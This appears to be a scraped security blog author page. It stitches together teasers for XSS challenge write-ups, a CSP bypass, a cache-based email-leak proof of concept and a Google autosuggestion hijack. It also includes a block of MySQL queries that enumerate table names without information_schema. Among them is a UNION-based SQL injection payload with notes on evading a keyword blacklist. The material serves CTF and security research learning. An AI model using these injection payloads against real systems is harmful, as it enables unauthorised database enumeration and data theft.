Writeup to Intigriti’s 0621 XSS challenge

Executing arbitrary parentheses-less XSS against strict Content Security Policies (CSP)

XSS Challenge

Alternative ways to retrieve table names in MySQL — without information_schema.

  • information_schema
  • “in” and “or” keywords
Full blacklist with examples

Alternatives to information_schema table
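As an added illustration (not the article’s own payload, and the article’s exact blacklist is not reproduced here), the queries below list table names from MySQL’s own statistics tables instead of information_schema. They assume InnoDB tables on MySQL 5.6 or later for mysql.innodb_table_stats / mysql.innodb_index_stats, MySQL 5.7 or later for the sys schema, and a database user with read access to those objects; the injection shape at the end assumes a two-column vulnerable query.

```sql
-- Added example: table-name enumeration without information_schema.
-- Assumes MySQL >= 5.6 for mysql.innodb_table_stats / innodb_index_stats
-- (InnoDB tables only; rows exist once persistent statistics were collected)
-- and MySQL >= 5.7 for the sys schema (coverage depends on performance_schema
-- instrumentation). Privileges on the mysql and sys schemas are required.

-- 1) InnoDB persistent statistics: one row per InnoDB table.
SELECT database_name, table_name
FROM mysql.innodb_table_stats
WHERE database_name NOT IN ('mysql', 'sys');

-- 2) Index statistics also carry the table name, plus the index name,
--    which helps spot primary keys and unique indexes.
SELECT DISTINCT database_name, table_name, index_name
FROM mysql.innodb_index_stats;

-- 3) sys schema view. Note that "sys.schema_table_statistics" contains
--    neither "in" nor "or" as a substring, unlike "innodb_table_stats",
--    so it survives a naive substring blacklist of those keywords;
--    which alternative is usable depends on the exact filter in place.
SELECT table_schema, table_name
FROM sys.schema_table_statistics;

-- 4) A UNION-based injection shape built on (3); the vulnerable query is
--    assumed to return exactly two columns (hypothetical target).
-- ' UNION SELECT table_schema, table_name FROM sys.schema_table_statistics-- -
```

Verify which statistics tables are populated on the target version before relying on them: innodb_table_stats is empty for tables whose persistent statistics were never computed, and the sys views only know about tables the Performance Schema has instrumented.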

Write-up based on “simple” XSS challenge by @terjanq

The challenge

  1. Displaying HTML code sanitized by DOMPurify, passed via the ?safe=html_code parameter.
  2. Embedding user’s unsafe code in…

Leaking user’s emails — Proof of Concept

A brief summary of the attack

  1. The attacker controls a malicious website, let’s call it evilwebsite.com
  2. On the malicious evilwebsite.com, the attacker evicts a specific resource (e.g. a “not found” image) from the visiting user’s browser cache

Based on @SecurityMB XSS Challenge

XSS Challenge

If you are familiar with the challenge details and are only interested in knowing the solutions, I recommend scrolling down to the ‘CSP Path bypass’ section.

Task description

and the deceiver of protected.

Quick introduction:

or rather: How I am able to hijack your autosuggestions in Google Search.

Proof of Concept in action


Content-Type: text/html


Security enthusiast that loves playing CTFs and hunting for bugs in the wild. Also likes to do some chess once in a while. twitter.com/terjanq
